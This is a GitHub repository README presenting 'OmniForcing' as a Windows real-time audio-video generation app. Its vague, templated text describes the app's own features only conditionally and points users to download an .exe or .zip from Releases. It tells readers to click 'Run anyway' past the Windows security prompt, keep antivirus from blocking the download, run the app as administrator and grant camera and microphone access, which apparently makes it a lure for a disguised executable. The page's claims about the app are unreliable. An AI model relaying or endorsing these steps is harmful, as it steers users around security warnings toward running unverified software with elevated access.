Skip to content

Born-enormity133/OmniForcing

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 
 
 

Repository files navigation

🎬 OmniForcing - Real-time Audio and Video Generation

Download OmniForcing

🧭 What OmniForcing Does

OmniForcing is a Windows app for real-time audio and video generation. It turns a single GPU into a live joint audio-visual generator.

This app is built for end users who want to run the released version on a Windows PC. You do not need to train a model or build the app from source to get started.

📥 Download

Visit the release page to download the Windows build:

Download OmniForcing from Releases

Look for the latest release and choose the Windows file that matches your system. In most cases, this will be a .exe installer or a .zip package.

💻 System Requirements

Use a Windows PC with the following setup:

  • Windows 10 or Windows 11
  • NVIDIA GPU with CUDA support
  • At least 8 GB of VRAM
  • 16 GB of system memory
  • 10 GB of free disk space
  • A recent NVIDIA driver
  • A stable internet connection for the first download

For smooth real-time output, a stronger GPU helps. If you plan to generate higher-quality audio and video, use a card with more VRAM.

🛠️ Before You Start

Check these items before you install:

  • Your Windows user account has permission to run downloaded apps
  • Your GPU driver is current
  • You have enough disk space for the app and its models
  • Your antivirus tool does not block the download
  • You know where your Downloads folder is

If the release page includes model files or extra assets, download those too and keep them in the same folder as the app, if the release notes say to do so.

🚀 Install and Run on Windows

Follow these steps in order:

  1. Open the Releases page
  2. Download the latest Windows release
  3. If the file is a .zip, right-click it and choose Extract All
  4. Open the extracted folder
  5. If the file is an .exe, double-click it to start the app
  6. If Windows shows a security prompt, choose More info and then Run anyway
  7. Wait for the app to finish loading
  8. Open the app window and load your audio or video source, if the build includes that option
  9. Start generation from inside the app

If the release page gives separate files for the app and the model, download both before you start.

🎛️ First Launch

The first time you open OmniForcing, it may take longer to start. The app may load model files into memory before you see the main window.

During first launch, you may see:

  • A short pause before the app opens
  • A console window
  • A model loading bar
  • A message about GPU setup

Let the app finish loading. Do not close it while the model is starting.

🎚️ Basic Use

OmniForcing is meant to make joint audio and video generation simple.

A typical flow looks like this:

  1. Open the app
  2. Load or connect your input source
  3. Choose the output settings
  4. Pick the quality level or speed mode
  5. Start generation
  6. Watch the live result in the preview area
  7. Save the output when you are done

If the app gives you controls for latency, frame rate, or audio length, use the default values first. Then adjust one setting at a time.

🎥 Output Tips

For better results, use clean input and stable hardware.

  • Use short test clips first
  • Keep background noise low for audio input
  • Close other GPU-heavy apps
  • Use a power plan that keeps your PC from sleeping
  • Make sure your monitor and GPU drivers are current

If the app supports live preview, check the preview before saving the final result.

🧩 Common File Types

You may see these file types on the release page:

  • .exe — run this file on Windows
  • .zip — extract the folder, then open the app
  • .json — settings or model config
  • .pth or .bin — model files
  • .txt — read this file for release notes or setup steps

If you are not sure which file to use, choose the Windows installer or the main app package from the latest release

⚙️ Recommended Setup

For the best experience, use this setup:

  • Windows 11
  • NVIDIA RTX 4070 or better
  • 32 GB RAM
  • SSD storage
  • Updated NVIDIA Studio Driver
  • A display with enough space for the app window and preview panels

A faster GPU and more memory help the app keep audio and video in sync during live generation.

🔍 If the App Does Not Open

Try these steps if the app does not start:

  1. Reboot your PC
  2. Update your NVIDIA driver
  3. Make sure the download finished fully
  4. Extract the full .zip file again
  5. Run the app as an administrator
  6. Check that Windows did not block the file
  7. Close other apps that use the GPU
  8. Try the latest release from the download page

If the app opens and then closes, look for a log file in the app folder and review the last few lines for the cause

🗂️ Folder Layout

A common release folder may look like this:

  • OmniForcing.exe — main app
  • models/ — model files
  • assets/ — app resources
  • logs/ — runtime logs
  • config/ — app settings

Keep the files in the same folder unless the release notes say otherwise.

🔒 Permissions

The app may need access to:

  • GPU resources
  • Microphone input
  • Camera input
  • File save locations

If Windows asks for permission, allow the app to use the device or folder it needs.

📚 Release Notes

Check the release page for:

  • New build versions
  • Bug fixes
  • Added input support
  • Model updates
  • Known issues
  • Extra setup files

Read the notes for the version you download. Some builds may have different steps or extra files.

🧪 Known Use Cases

OmniForcing can fit these use cases:

  • Real-time audio-visual demos
  • Live generation tests
  • GPU performance checks
  • Research playback
  • Creative prototyping
  • Streaming experiments

It is built for fast joint generation, so it works best on a machine with a strong NVIDIA GPU.

📌 Quick Steps

  1. Open the release page
  2. Download the Windows build
  3. Extract the file if needed
  4. Run the app
  5. Wait for model loading
  6. Start generation
  7. Save your output